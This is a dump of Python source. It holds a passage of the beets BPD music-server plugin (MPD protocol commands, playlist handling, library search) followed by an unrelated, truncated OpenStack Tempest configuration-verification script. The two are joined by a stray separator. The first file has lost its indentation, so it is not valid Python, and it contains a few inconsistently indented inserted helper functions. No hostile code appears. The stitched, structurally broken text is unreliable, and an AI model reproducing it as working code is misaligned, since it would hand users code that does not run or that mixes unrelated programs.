# Loop finished with no track found.
raise ArgumentNotFoundError()
def _random_idx(self):
"""Returns a random index different from the current one.
If there are no songs in the playlist it returns -1.
If there is only one song in the playlist it returns 0.
"""
if len(self.playlist) < 2:
return len(self.playlist) - 1
new_index = self.random_obj.randint(0, len(self.playlist) - 1)
while new_index == self.current_index:
new_index = self.random_obj.randint(0, len(self.playlist) - 1)
return new_index
def _succ_idx(self):
"""Returns the index for the next song to play.
It also considers random and repeat flags.
No boundaries are checked.
"""
if self.repeat:
return self.current_index
if self.random:
return self._random_idx()
return self.current_index + 1
def _prev_idx(self):
"""Returns the index for the previous song to play.
It also considers random and repeat flags.
No boundaries are checked.
"""
if self.repeat:
return self.current_index
if self.random:
return self._random_idx()
return self.current_index - 1
def cmd_ping(self, conn):
"""Succeeds."""
pass
def cmd_kill(self, conn):
"""Exits the server process."""
exit(0)
def cmd_close(self, conn):
"""Closes the connection."""
raise BPDClose()
def cmd_password(self, conn, password):
"""Attempts password authentication."""
if password == self.password:
conn.authenticated = True
else:
conn.authenticated = False
raise BPDError(ERROR_PASSWORD, 'incorrect password')
def cmd_commands(self, conn):
"""Lists the commands available to the user."""
if self.password and not conn.authenticated:
# Not authenticated. Show limited list of commands.
for cmd in SAFE_COMMANDS:
yield u'command: ' + cmd
else:
# Authenticated. Show all commands.
for func in dir(self):
if func.startswith('cmd_'):
yield u'command: ' + func[4:]
def cmd_notcommands(self, conn):
"""Lists all unavailable commands."""
if self.password and not conn.authenticated:
# Not authenticated. Show privileged commands.
for func in dir(self):
if func.startswith('cmd_'):
cmd = func[4:]
if cmd not in SAFE_COMMANDS:
yield u'command: ' + cmd
else:
# Authenticated. No commands are unavailable.
pass
def cmd_status(self, conn):
"""Returns some status information for use with an
implementation of cmd_status.
Gives a list of response-lines for: volume, repeat, random,
playlist, playlistlength, and xfade.
"""
yield (
u'volume: ' + unicode(self.volume),
u'repeat: ' + unicode(int(self.repeat)),
u'random: ' + unicode(int(self.random)),
u'playlist: ' + unicode(self.playlist_version),
u'playlistlength: ' + unicode(len(self.playlist)),
u'xfade: ' + unicode(self.crossfade),
)
if self.current_index == -1:
state = u'stop'
elif self.paused:
state = u'pause'
else:
state = u'play'
yield u'state: ' + state
if self.current_index != -1: # i.e., paused or playing
current_id = self._item_id(self.playlist[self.current_index])
yield u'song: ' + unicode(self.current_index)
yield u'songid: ' + unicode(current_id)
if self.error:
yield u'error: ' + self.error
def cmd_clearerror(self, conn):
"""Removes the persistent error state of the server. This
error is set when a problem arises not in response to a
command (for instance, when playing a file).
"""
self.error = None
def cmd_random(self, conn, state):
"""Set or unset random (shuffle) mode."""
self.random = cast_arg('intbool', state)
def cmd_repeat(self, conn, state):
"""Set or unset repeat mode."""
self.repeat = cast_arg('intbool', state)
def cmd_setvol(self, conn, vol):
"""Set the player's volume level (0-100)."""
vol = cast_arg(int, vol)
if vol < VOLUME_MIN or vol > VOLUME_MAX:
raise BPDError(ERROR_ARG, u'volume out of range')
self.volume = vol
def cmd_crossfade(self, conn, crossfade):
"""Set the number of seconds of crossfading."""
        crossfade = cast_arg(int, crossfade)
        if crossfade < 0:
            raise BPDError(ERROR_ARG, u'crossfade time must be nonnegative')
        # Record the value so that cmd_status reports it back.
        self.crossfade = crossfade
def cmd_clear(self, conn):
"""Clear the playlist."""
self.playlist = []
self.playlist_version += 1
self.cmd_stop(conn)
def cmd_delete(self, conn, index):
"""Remove the song at index from the playlist."""
index = cast_arg(int, index)
try:
del(self.playlist[index])
except IndexError:
raise ArgumentIndexError()
self.playlist_version += 1
if self.current_index == index: # Deleted playing song.
self.cmd_stop(conn)
elif index < self.current_index: # Deleted before playing.
# Shift playing index down.
self.current_index -= 1
def cmd_deleteid(self, conn, track_id):
self.cmd_delete(conn, self._id_to_index(track_id))
def cmd_move(self, conn, idx_from, idx_to):
"""Move a track in the playlist."""
idx_from = cast_arg(int, idx_from)
idx_to = cast_arg(int, idx_to)
try:
track = self.playlist.pop(idx_from)
self.playlist.insert(idx_to, track)
except IndexError:
raise ArgumentIndexError()
# Update currently-playing song.
if idx_from == self.current_index:
self.current_index = idx_to
elif idx_from < self.current_index <= idx_to:
self.current_index -= 1
elif idx_from > self.current_index >= idx_to:
self.current_index += 1
self.playlist_version += 1
def cmd_moveid(self, conn, idx_from, idx_to):
idx_from = self._id_to_index(idx_from)
return self.cmd_move(conn, idx_from, idx_to)
def cmd_swap(self, conn, i, j):
"""Swaps two tracks in the playlist."""
i = cast_arg(int, i)
j = cast_arg(int, j)
try:
track_i = self.playlist[i]
track_j = self.playlist[j]
except IndexError:
raise ArgumentIndexError()
self.playlist[j] = track_i
self.playlist[i] = track_j
# Update currently-playing song.
if self.current_index == i:
self.current_index = j
elif self.current_index == j:
self.current_index = i
self.playlist_version += 1
def cmd_swapid(self, conn, i_id, j_id):
i = self._id_to_index(i_id)
j = self._id_to_index(j_id)
return self.cmd_swap(conn, i, j)
def cmd_urlhandlers(self, conn):
"""Indicates supported URL schemes. None by default."""
pass
def cmd_playlistinfo(self, conn, index=-1):
"""Gives metadata information about the entire playlist or a
single track, given by its index.
"""
index = cast_arg(int, index)
if index == -1:
for track in self.playlist:
yield self._item_info(track)
else:
try:
track = self.playlist[index]
except IndexError:
raise ArgumentIndexError()
yield self._item_info(track)
def cmd_playlistid(self, conn, track_id=-1):
return self.cmd_playlistinfo(conn, self._id_to_index(track_id))
def cmd_plchanges(self, conn, version):
"""Sends playlist changes since the given version.
This is a "fake" implementation that ignores the version and
just returns the entire playlist (rather like version=0). This
seems to satisfy many clients.
"""
return self.cmd_playlistinfo(conn)
def cmd_plchangesposid(self, conn, version):
"""Like plchanges, but only sends position and id.
Also a dummy implementation.
"""
for idx, track in enumerate(self.playlist):
yield u'cpos: ' + unicode(idx)
yield u'Id: ' + unicode(track.id)
def cmd_currentsong(self, conn):
"""Sends information about the currently-playing song.
"""
if self.current_index != -1: # -1 means stopped.
track = self.playlist[self.current_index]
yield self._item_info(track)
def cmd_next(self, conn):
"""Advance to the next song in the playlist."""
self.current_index = self._succ_idx()
if self.current_index >= len(self.playlist):
# Fallen off the end. Just move to stopped state.
return self.cmd_stop(conn)
else:
return self.cmd_play(conn)
def cmd_previous(self, conn):
"""Step back to the last song."""
self.current_index = self._prev_idx()
if self.current_index < 0:
return self.cmd_stop(conn)
else:
return self.cmd_play(conn)
def cmd_pause(self, conn, state=None):
"""Set the pause state playback."""
if state is None:
self.paused = not self.paused # Toggle.
else:
self.paused = cast_arg('intbool', state)
def cmd_play(self, conn, index=-1):
"""Begin playback, possibly at a specified playlist index."""
index = cast_arg(int, index)
if index < -1 or index > len(self.playlist):
raise ArgumentIndexError()
if index == -1: # No index specified: start where we are.
if not self.playlist: # Empty playlist: stop immediately.
return self.cmd_stop(conn)
if self.current_index == -1: # No current song.
self.current_index = 0 # Start at the beginning.
# If we have a current song, just stay there.
else: # Start with the specified index.
self.current_index = index
self.paused = False
def cmd_playid(self, conn, track_id=0):
track_id = cast_arg(int, track_id)
if track_id == -1:
index = -1
else:
index = self._id_to_index(track_id)
return self.cmd_play(conn, index)
def cmd_stop(self, conn):
"""Stop playback."""
self.current_index = -1
self.paused = False
def cmd_seek(self, conn, index, pos):
"""Seek to a specified point in a specified song."""
index = cast_arg(int, index)
if index < 0 or index >= len(self.playlist):
raise ArgumentIndexError()
self.current_index = index
def cmd_seekid(self, conn, track_id, pos):
index = self._id_to_index(track_id)
return self.cmd_seek(conn, index, pos)
def cmd_profile(self, conn):
"""Memory profiling for debugging."""
from guppy import hpy
heap = hpy().heap()
print(heap)
class Connection(object):
"""A connection between a client and the server. Handles input and
output from and to the client.
"""
def __init__(self, server, sock):
"""Create a new connection for the accepted socket `client`.
"""
self.server = server
self.sock = sock
self.authenticated = False
def send(self, lines):
"""Send lines, which which is either a single string or an
iterable consisting of strings, to the client. A newline is
added after every string. Returns a Bluelet event that sends
the data.
"""
if isinstance(lines, basestring):
lines = [lines]
out = NEWLINE.join(lines) + NEWLINE
log.debug('{}', out[:-1]) # Don't log trailing newline.
if isinstance(out, unicode):
out = out.encode('utf8')
return self.sock.sendall(out)
def do_command(self, command):
"""A coroutine that runs the given command and sends an
appropriate response."""
try:
yield bluelet.call(command.run(self))
except BPDError as e:
# Send the error.
yield self.send(e.response())
else:
# Send success code.
yield self.send(RESP_OK)
def run(self):
"""Send a greeting to the client and begin processing commands
as they arrive.
"""
yield self.send(HELLO)
clist = None # Initially, no command list is being constructed.
while True:
line = yield self.sock.readline()
if not line:
break
line = line.strip()
if not line:
break
log.debug('{}', line)
if clist is not None:
# Command list already opened.
if line == CLIST_END:
yield bluelet.call(self.do_command(clist))
clist = None # Clear the command list.
else:
clist.append(Command(line))
elif line == CLIST_BEGIN or line == CLIST_VERBOSE_BEGIN:
# Begin a command list.
clist = CommandList([], line == CLIST_VERBOSE_BEGIN)
else:
# Ordinary command.
try:
yield bluelet.call(self.do_command(Command(line)))
except BPDClose:
# Command indicates that the conn should close.
self.sock.close()
return
@classmethod
def handler(cls, server):
def _handle(sock):
"""Creates a new `Connection` and runs it.
"""
return cls(server, sock).run()
return _handle
class Command(object):
"""A command issued by the client for processing by the server.
"""
command_re = re.compile(br'^([^ \t]+)[ \t]*')
arg_re = re.compile(br'"((?:\\"|[^"])+)"|([^ \t"]+)')
def __init__(self, s):
"""Creates a new `Command` from the given string, `s`, parsing
the string for command name and arguments.
"""
command_match = self.command_re.match(s)
self.name = command_match.group(1)
self.args = []
arg_matches = self.arg_re.findall(s[command_match.end():])
for match in arg_matches:
if match[0]:
# Quoted argument.
arg = match[0]
arg = arg.replace(b'\\"', b'"').replace(b'\\\\', b'\\')
else:
# Unquoted argument.
arg = match[1]
arg = arg.decode('utf8')
self.args.append(arg)
def run(self, conn):
"""A coroutine that executes the command on the given
connection.
"""
# Attempt to get correct command function.
func_name = 'cmd_' + self.name
if not hasattr(conn.server, func_name):
raise BPDError(ERROR_UNKNOWN, u'unknown command', self.name)
func = getattr(conn.server, func_name)
# Ensure we have permission for this command.
if conn.server.password and \
not conn.authenticated and \
self.name not in SAFE_COMMANDS:
raise BPDError(ERROR_PERMISSION, u'insufficient privileges')
try:
args = [conn] + self.args
results = func(*args)
if results:
for data in results:
yield conn.send(data)
except BPDError as e:
# An exposed error. Set the command name and then let
# the Connection handle it.
e.cmd_name = self.name
raise e
except BPDClose:
# An indication that the connection should close. Send
# it on the Connection.
raise
except Exception as e:
# An "unintentional" error. Hide it from the client.
            log.error('{}', traceback.format_exc())
raise BPDError(ERROR_SYSTEM, u'server error', self.name)
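# A minimal sketch (not part of BPD itself; the sample line is hypothetical)
# of how the Command parser above splits a raw protocol line into a command
# name and decoded arguments.
def _example_command_parsing():
    cmd = Command(b'find "Artist" "Daft Punk"')
    # cmd.name == b'find'; cmd.args == [u'Artist', u'Daft Punk']
    return cmd.name, cmd.args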
class CommandList(list):
"""A list of commands issued by the client for processing by the
server. May be verbose, in which case the response is delimited, or
not. Should be a list of `Command` objects.
"""
def __init__(self, sequence=None, verbose=False):
"""Create a new `CommandList` from the given sequence of
`Command`s. If `verbose`, this is a verbose command list.
"""
if sequence:
for item in sequence:
self.append(item)
self.verbose = verbose
def run(self, conn):
"""Coroutine executing all the commands in this list.
"""
for i, command in enumerate(self):
try:
yield bluelet.call(command.run(conn))
except BPDError as e:
# If the command failed, stop executing.
e.index = i # Give the error the correct index.
raise e
            # Otherwise, possibly send the output delimiter if we're in a
# verbose ("OK") command list.
if self.verbose:
yield conn.send(RESP_CLIST_VERBOSE)
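# Hypothetical illustration of how Connection.run assembles a verbose command
# list (command_list_ok_begin ... command_list_end) before dispatching it.
def _example_command_list():
    clist = CommandList([], True)  # verbose: an OK line follows each command
    clist.append(Command(b'status'))
    clist.append(Command(b'currentsong'))
    return clist  # Connection.do_command() would run it via clist.run(conn)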
# A subclass of the basic, protocol-handling server that actually plays
# music.
class Server(BaseServer):
"""An MPD-compatible server using GStreamer to play audio and beets
to store its library.
"""
def __init__(self, library, host, port, password):
try:
from beetsplug.bpd import gstplayer
except ImportError as e:
            # This is a little hacky, but it's the best approach I know of for now.
if e.args[0].endswith(' gst'):
raise NoGstreamerError()
else:
raise
super(Server, self).__init__(host, port, password)
self.lib = library
self.player = gstplayer.GstPlayer(self.play_finished)
self.cmd_update(None)
def run(self):
self.player.run()
super(Server, self).run()
def play_finished(self):
"""A callback invoked every time our player finishes a
track.
"""
self.cmd_next(None)
# Metadata helper functions.
def _item_info(self, item):
info_lines = [
u'file: ' + item.destination(fragment=True),
u'Time: ' + unicode(int(item.length)),
u'Title: ' + item.title,
u'Artist: ' + item.artist,
u'Album: ' + item.album,
u'Genre: ' + item.genre,
]
track = unicode(item.track)
if item.tracktotal:
track += u'/' + unicode(item.tracktotal)
info_lines.append(u'Track: ' + track)
info_lines.append(u'Date: ' + unicode(item.year))
try:
pos = self._id_to_index(item.id)
info_lines.append(u'Pos: ' + unicode(pos))
except ArgumentNotFoundError:
# Don't include position if not in playlist.
pass
info_lines.append(u'Id: ' + unicode(item.id))
return info_lines
def _item_id(self, item):
return item.id
# Database updating.
def cmd_update(self, conn, path=u'/'):
"""Updates the catalog to reflect the current database state.
"""
# Path is ignored. Also, the real MPD does this asynchronously;
# this is done inline.
print('Building directory tree...')
self.tree = vfs.libtree(self.lib)
print('... done.')
self.updated_time = time.time()
# Path (directory tree) browsing.
def _resolve_path(self, path):
"""Returns a VFS node or an item ID located at the path given.
        If the path does not exist, raises an ArgumentNotFoundError.
"""
components = path.split(u'/')
node = self.tree
for component in components:
if not component:
continue
if isinstance(node, int):
# We're trying to descend into a file node.
raise ArgumentNotFoundError()
if component in node.files:
node = node.files[component]
elif component in node.dirs:
node = node.dirs[component]
else:
raise ArgumentNotFoundError()
return node
def _path_join(self, p1, p2):
"""Smashes together two BPD paths."""
out = p1 + u'/' + p2
return out.replace(u'//', u'/').replace(u'//', u'/')
def cmd_lsinfo(self, conn, path=u"/"):
"""Sends info on all the items in the path."""
node = self._resolve_path(path)
if isinstance(node, int):
# Trying to list a track.
raise BPDError(ERROR_ARG, 'this is not a directory')
else:
for name, itemid in iter(sorted(node.files.items())):
item = self.lib.get_item(itemid)
yield self._item_info(item)
for name, _ in iter(sorted(node.dirs.iteritems())):
dirpath = self._path_join(path, name)
if dirpath.startswith(u"/"):
# Strip leading slash (libmpc rejects this).
dirpath = dirpath[1:]
yield u'directory: %s' % dirpath
def _listall(self, basepath, node, info=False):
"""Helper function for recursive listing. If info, show
tracks' complete info; otherwise, just show items' paths.
"""
if isinstance(node, int):
# List a single file.
if info:
item = self.lib.get_item(node)
yield self._item_info(item)
else:
yield u'file: ' + basepath
else:
# List a directory. Recurse into both directories and files.
for name, itemid in sorted(node.files.iteritems()):
newpath = self._path_join(basepath, name)
# "yield from"
for v in self._listall(newpath, itemid, info):
yield v
for name, subdir in sorted(node.dirs.iteritems()):
newpath = self._path_join(basepath, name)
yield u'directory: ' + newpath
for v in self._listall(newpath, subdir, info):
yield v
def cmd_listall(self, conn, path=u"/"):
"""Send the paths all items in the directory, recursively."""
return self._listall(path, self._resolve_path(path), False)
def cmd_listallinfo(self, conn, path=u"/"):
"""Send info on all the items in the directory, recursively."""
return self._listall(path, self._resolve_path(path), True)
# Playlist manipulation.
def _all_items(self, node):
"""Generator yielding all items under a VFS node.
"""
if isinstance(node, int):
# Could be more efficient if we built up all the IDs and
# then issued a single SELECT.
yield self.lib.get_item(node)
else:
# Recurse into a directory.
for name, itemid in sorted(node.files.iteritems()):
# "yield from"
for v in self._all_items(itemid):
yield v
for name, subdir in sorted(node.dirs.iteritems()):
for v in self._all_items(subdir):
yield v
def _add(self, path, send_id=False):
"""Adds a track or directory to the playlist, specified by the
path. If `send_id`, write each item's id to the client.
"""
for item in self._all_items(self._resolve_path(path)):
self.playlist.append(item)
if send_id:
yield u'Id: ' + unicode(item.id)
self.playlist_version += 1
def cmd_add(self, conn, path):
"""Adds a track or directory to the playlist, specified by a
path.
"""
return self._add(path, False)
def cmd_addid(self, conn, path):
"""Same as `cmd_add` but sends an id back to the client."""
return self._add(path, True)
# Server info.
def cmd_status(self, conn):
for line in super(Server, self).cmd_status(conn):
yield line
if self.current_index > -1:
item = self.playlist[self.current_index]
yield u'bitrate: ' + unicode(item.bitrate / 1000)
# Missing 'audio'.
(pos, total) = self.player.time()
yield u'time: ' + unicode(pos) + u':' + unicode(total)
# Also missing 'updating_db'.
def cmd_stats(self, conn):
"""Sends some statistics about the library."""
with self.lib.transaction() as tx:
statement = 'SELECT COUNT(DISTINCT artist), ' \
'COUNT(DISTINCT album), ' \
'COUNT(id), ' \
'SUM(length) ' \
'FROM items'
artists, albums, songs, totaltime = tx.query(statement)[0]
yield (
u'artists: ' + unicode(artists),
u'albums: ' + unicode(albums),
u'songs: ' + unicode(songs),
u'uptime: ' + unicode(int(time.time() - self.startup_time)),
u'playtime: ' + u'0', # Missing.
u'db_playtime: ' + unicode(int(totaltime)),
u'db_update: ' + unicode(int(self.updated_time)),
)
# Searching.
tagtype_map = {
u'Artist': u'artist',
u'Album': u'album',
u'Title': u'title',
u'Track': u'track',
u'AlbumArtist': u'albumartist',
u'AlbumArtistSort': u'albumartist_sort',
# Name?
u'Genre': u'genre',
u'Date': u'year',
u'Composer': u'composer',
# Performer?
u'Disc': u'disc',
u'filename': u'path', # Suspect.
}
def cmd_tagtypes(self, conn):
"""Returns a list of the metadata (tag) fields available for
searching.
"""
for tag in self.tagtype_map:
yield u'tagtype: ' + tag
def _tagtype_lookup(self, tag):
"""Uses `tagtype_map` to look up the beets column name for an
MPD tagtype (or throw an appropriate exception). Returns both
the canonical name of the MPD tagtype and the beets column
name.
"""
for test_tag, key in self.tagtype_map.items():
# Match case-insensitively.
if test_tag.lower() == tag.lower():
return test_tag, key
raise BPDError(ERROR_UNKNOWN, u'no such tagtype')
def _metadata_query(self, query_type, any_query_type, kv):
"""Helper function returns a query object that will find items
according to the library query type provided and the key-value
pairs specified. The any_query_type is used for queries of
type "any"; if None, then an error is thrown.
"""
if kv: # At least one key-value pair.
queries = []
# Iterate pairwise over the arguments.
it = iter(kv)
for tag, value in zip(it, it):
if tag.lower() == u'any':
if any_query_type:
queries.append(any_query_type(value,
ITEM_KEYS_WRITABLE,
query_type))
else:
raise BPDError(ERROR_UNKNOWN, u'no such tagtype')
else:
_, key = self._tagtype_lookup(tag)
queries.append(query_type(key, value))
return dbcore.query.AndQuery(queries)
else: # No key-value pairs.
return dbcore.query.TrueQuery()
def cmd_search(self, conn, *kv):
"""Perform a substring match for items."""
query = self._metadata_query(dbcore.query.SubstringQuery,
dbcore.query.AnyFieldQuery,
kv)
for item in self.lib.items(query):
yield self._item_info(item)
def cmd_find(self, conn, *kv):
"""Perform an exact match for items."""
query = self._metadata_query(dbcore.query.MatchQuery,
None,
kv)
for item in self.lib.items(query):
yield self._item_info(item)
def cmd_list(self, conn, show_tag, *kv):
"""List distinct metadata values for show_tag, possibly
filtered by matching match_tag to match_term.
"""
show_tag_canon, show_key = self._tagtype_lookup(show_tag)
query = self._metadata_query(dbcore.query.MatchQuery, None, kv)
clause, subvals = query.clause()
statement = 'SELECT DISTINCT ' + show_key + \
' FROM items WHERE ' + clause + \
' ORDER BY ' + show_key
with self.lib.transaction() as tx:
rows = tx.query(statement, subvals)
for row in rows:
yield show_tag_canon + u': ' + unicode(row[0])
def cmd_count(self, conn, tag, value):
"""Returns the number and total time of songs matching the
tag/value query.
"""
_, key = self._tagtype_lookup(tag)
songs = 0
playtime = 0.0
for item in self.lib.items(dbcore.query.MatchQuery(key, value)):
songs += 1
playtime += item.length
yield u'songs: ' + unicode(songs)
yield u'playtime: ' + unicode(int(playtime))
# "Outputs." Just a dummy implementation because we don't control
# any outputs.
def cmd_outputs(self, conn):
"""List the available outputs."""
yield (
u'outputid: 0',
u'outputname: gstreamer',
u'outputenabled: 1',
)
def cmd_enableoutput(self, conn, output_id):
output_id = cast_arg(int, output_id)
if output_id != 0:
raise ArgumentIndexError()
def cmd_disableoutput(self, conn, output_id):
output_id = cast_arg(int, output_id)
if output_id == 0:
raise BPDError(ERROR_ARG, u'cannot disable this output')
else:
raise ArgumentIndexError()
# Playback control. The functions below hook into the
# half-implementations provided by the base class. Together, they're
# enough to implement all normal playback functionality.
def cmd_play(self, conn, index=-1):
new_index = index != -1 and index != self.current_index
was_paused = self.paused
super(Server, self).cmd_play(conn, index)
if self.current_index > -1: # Not stopped.
if was_paused and not new_index:
# Just unpause.
self.player.play()
else:
self.player.play_file(self.playlist[self.current_index].path)
def cmd_pause(self, conn, state=None):
super(Server, self).cmd_pause(conn, state)
if self.paused:
self.player.pause()
elif self.player.playing:
self.player.play()
def cmd_stop(self, conn):
super(Server, self).cmd_stop(conn)
self.player.stop()
def cmd_seek(self, conn, index, pos):
"""Seeks to the specified position in the specified song."""
index = cast_arg(int, index)
pos = cast_arg(int, pos)
super(Server, self).cmd_seek(conn, index, pos)
self.player.seek(pos)
# Volume control.
def cmd_setvol(self, conn, vol):
vol = cast_arg(int, vol)
super(Server, self).cmd_setvol(conn, vol)
self.player.volume = float(vol) / 100
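# Illustration only (an assumption, not part of the plugin): the search
# commands map MPD tag names onto beets fields through Server.tagtype_map,
# using the same case-insensitive match as Server._tagtype_lookup.
def _example_tagtype_lookup(tag=u'date'):
    for test_tag, key in Server.tagtype_map.items():
        if test_tag.lower() == tag.lower():
            return test_tag, key  # e.g. (u'Date', u'year')
    return None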
# Beets plugin hooks.
class BPDPlugin(BeetsPlugin):
"""Provides the "beet bpd" command for running a music player
server.
"""
def __init__(self):
super(BPDPlugin, self).__init__()
self.config.add({
'host': u'',
'port': 6600,
'password': u'',
'volume': VOLUME_MAX,
})
self.config['password'].redact = True
def start_bpd(self, lib, host, port, password, volume, debug):
"""Starts a BPD server."""
if debug: # FIXME this should be managed by BeetsPlugin
self._log.setLevel(logging.DEBUG)
else:
self._log.setLevel(logging.WARNING)
try:
server = Server(lib, host, port, password)
server.cmd_setvol(None, volume)
server.run()
except NoGstreamerError:
global_log.error(u'Gstreamer Python bindings not found.')
global_log.error(u'Install "python-gst0.10", "py27-gst-python", '
u'or similar package to use BPD.')
def commands(self):
cmd = beets.ui.Subcommand(
'bpd', help='run an MPD-compatible music player server'
)
cmd.parser.add_option(
'-d', '--debug', action='store_true',
help='dump all MPD traffic to stdout'
)
def func(lib, opts, args):
host = args.pop(0) if args else self.config['host'].get(unicode)
port = args.pop(0) if args else self.config['port'].get(int)
if args:
raise beets.ui.UserError('too many arguments')
password = self.config['password'].get(unicode)
volume = self.config['volume'].get(int)
debug = opts.debug or False
self.start_bpd(lib, host, int(port), password, volume, debug)
cmd.func = func
return [cmd]
|
|
#!/usr/bin/env python
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import os
import sys
import httplib2
from oslo_serialization import jsonutils as json
from six import moves
from six.moves.urllib import parse as urlparse
from tempest import clients
from tempest.common import credentials
from tempest import config
CONF = config.CONF
CONF_PARSER = None
def _get_config_file():
default_config_dir = os.path.join(os.path.abspath(
os.path.dirname(os.path.dirname(os.path.dirname(__file__)))), "etc")
default_config_file = "tempest.conf"
conf_dir = os.environ.get('TEMPEST_CONFIG_DIR', default_config_dir)
conf_file = os.environ.get('TEMPEST_CONFIG', default_config_file)
path = os.path.join(conf_dir, conf_file)
    fd = open(path, 'r')  # read-only; updates are written to a separate file
return fd
def change_option(option, group, value):
if not CONF_PARSER.has_section(group):
CONF_PARSER.add_section(group)
CONF_PARSER.set(group, option, str(value))
def print_and_or_update(option, group, value, update):
print('Config option %s in group %s should be changed to: %s'
% (option, group, value))
if update:
change_option(option, group, value)
def contains_version(prefix, versions):
return any([x for x in versions if x.startswith(prefix)])
def verify_glance_api_versions(os, update):
# Check glance api versions
_, versions = os.image_client.get_versions()
if CONF.image_feature_enabled.api_v1 != contains_version('v1.', versions):
print_and_or_update('api_v1', 'image-feature-enabled',
not CONF.image_feature_enabled.api_v1, update)
if CONF.image_feature_enabled.api_v2 != contains_version('v2.', versions):
print_and_or_update('api_v2', 'image-feature-enabled',
not CONF.image_feature_enabled.api_v2, update)
def _get_unversioned_endpoint(base_url):
endpoint_parts = urlparse.urlparse(base_url)
endpoint = endpoint_parts.scheme + '://' + endpoint_parts.netloc
return endpoint
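# Hypothetical example (the URL is made up): _get_unversioned_endpoint keeps
# only the scheme and netloc, so 'https://keystone.example.com:5000/v3'
# becomes 'https://keystone.example.com:5000'.
def _example_unversioned_endpoint():
    return _get_unversioned_endpoint('https://keystone.example.com:5000/v3')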
def _get_api_versions(os, service):
client_dict = {
'nova': os.servers_client,
'keystone': os.identity_client,
'cinder': os.volumes_client,
}
client_dict[service].skip_path()
endpoint = _get_unversioned_endpoint(client_dict[service].base_url)
dscv = CONF.identity.disable_ssl_certificate_validation
ca_certs = CONF.identity.ca_certificates_file
raw_http = httplib2.Http(disable_ssl_certificate_validation=dscv,
ca_certs=ca_certs)
__, body = raw_http.request(endpoint, 'GET')
client_dict[service].reset_path()
body = json.loads(body)
if service == 'keystone':
versions = map(lambda x: x['id'], body['versions']['values'])
else:
versions = map(lambda x: x['id'], body['versions'])
return list(versions)
def verify_keystone_api_versions(os, update):
# Check keystone api versions
versions = _get_api_versions(os, 'keystone')
if (CONF.identity_feature_enabled.api_v2 !=
contains_version('v2.', versions)):
print_and_or_update('api_v2', 'identity-feature-enabled',
not CONF.identity_feature_enabled.api_v2, update)
if (CONF.identity_feature_enabled.api_v3 !=
contains_version('v3.', versions)):
print_and_or_update('api_v3', 'identity-feature-enabled',
not CONF.identity_feature_enabled.api_v3, update)
def verify_cinder_api_versions(os, update):
# Check cinder api versions
versions = _get_api_versions(os, 'cinder')
if (CONF.volume_feature_enabled.api_v1 !=
contains_version('v1.', versions)):
print_and_or_update('api_v1', 'volume-feature-enabled',
not CONF.volume_feature_enabled.api_v1, update)
if (CONF.volume_feature_enabled.api_v2 !=
contains_version('v2.', versions)):
print_and_or_update('api_v2', 'volume-feature-enabled',
not CONF.volume_feature_enabled.api_v2, update)
def verify_api_versions(os, service, update):
verify = {
'cinder': verify_cinder_api_versions,
'glance': verify_glance_api_versions,
'keystone': verify_keystone_api_versions,
}
if service not in verify:
return
verify[service](os, update)
def get_extension_client(os, service):
extensions_client = {
'nova': os.extensions_client,
'cinder': os.volumes_extension_client,
'neutron': os.network_client,
'swift': os.account_client,
}
# NOTE (e0ne): Use Cinder API v2 by default because v1 is deprecated
if CONF.volume_feature_enabled.api_v2:
extensions_client['cinder'] = os.volumes_v2_extension_client
else:
extensions_client['cinder'] = os.volumes_extension_client
if service not in extensions_client:
print('No tempest extensions client for %s' % service)
exit(1)
return extensions_client[service]
def get_enabled_extensions(service):
extensions_options = {
'nova': CONF.compute_feature_enabled.api_extensions,
'cinder': CONF.volume_feature_enabled.api_extensions,
'neutron': CONF.network_feature_enabled.api_extensions,
'swift': CONF.object_storage_feature_enabled.discoverable_apis,
}
if service not in extensions_options:
print('No supported extensions list option for %s' % service)
exit(1)
return extensions_options[service]
def verify_extensions(os, service, results):
extensions_client = get_extension_client(os, service)
if service != 'swift':
resp = extensions_client.list_extensions()
else:
__, resp = extensions_client.list_extensions()
# For Nova, Cinder and Neutron we use the alias name rather than the
# 'name' field because the alias is considered to be the canonical
# name.
if isinstance(resp, dict):
if service == 'swift':
# Remove Swift general information from extensions list
resp.pop('swift')
extensions = resp.keys()
else:
extensions = map(lambda x: x['alias'], resp['extensions'])
else:
extensions = map(lambda x: x['alias'], resp)
extensions = list(extensions)
if not results.get(service):
results[service] = {}
extensions_opt = get_enabled_extensions(service)
if extensions_opt[0] == 'all':
results[service]['extensions'] = extensions
return results
# Verify that all configured extensions are actually enabled
for extension in extensions_opt:
results[service][extension] = extension in extensions
# Verify that there aren't additional extensions enabled that aren't
# specified in the config list
for extension in extensions:
if extension not in extensions_opt:
results[service][extension] = False
return results
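# Sketch of the `results` structure built by verify_extensions (extension
# names are illustrative): True means the config and the API agree that the
# extension is enabled, False means they disagree.
def _example_results_shape():
    return {'nova': {'os-agents': True, 'os-baremetal-nodes': False}}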
def display_results(results, update, replace):
update_dict = {
'swift': 'object-storage-feature-enabled',
'nova': 'compute-feature-enabled',
'cinder': 'volume-feature-enabled',
'neutron': 'network-feature-enabled',
}
for service in results:
        # If all extensions are specified as being enabled, there is no way
        # to verify this, so we just assume it to be true.
if results[service].get('extensions'):
if replace:
output_list = results[service].get('extensions')
else:
output_list = ['all']
else:
extension_list = get_enabled_extensions(service)
output_list = []
for extension in results[service]:
if not results[service][extension]:
if extension in extension_list:
print("%s extension: %s should not be included in the "
"list of enabled extensions" % (service,
extension))
else:
print("%s extension: %s should be included in the list"
" of enabled extensions" % (service, extension))
output_list.append(extension)
else:
output_list.append(extension)
if update:
# Sort List
output_list.sort()
# Convert list to a string
output_string = ', '.join(output_list)
if service == 'swift':
change_option('discoverable_apis', update_dict[service],
output_string)
else:
change_option('api_extensions', update_dict[service],
output_string)
def check_service_availability(os, update):
services = []
avail_services = []
codename_match = {
'volume': 'cinder',
'network': 'neutron',
'image': 'glance',
'object_storage': 'swift',
'compute': 'nova',
'orchestration': 'heat',
'metering': 'ceilometer',
'telemetry': 'ceilometer',
'data_processing': 'sahara',
'baremetal': 'ironic',
'identity': 'keystone',
'messaging': 'zaqar',
'database': 'trove'
}
# Get catalog list for endpoints to use for validation
_token, auth_data = os.auth_provider.get_auth()
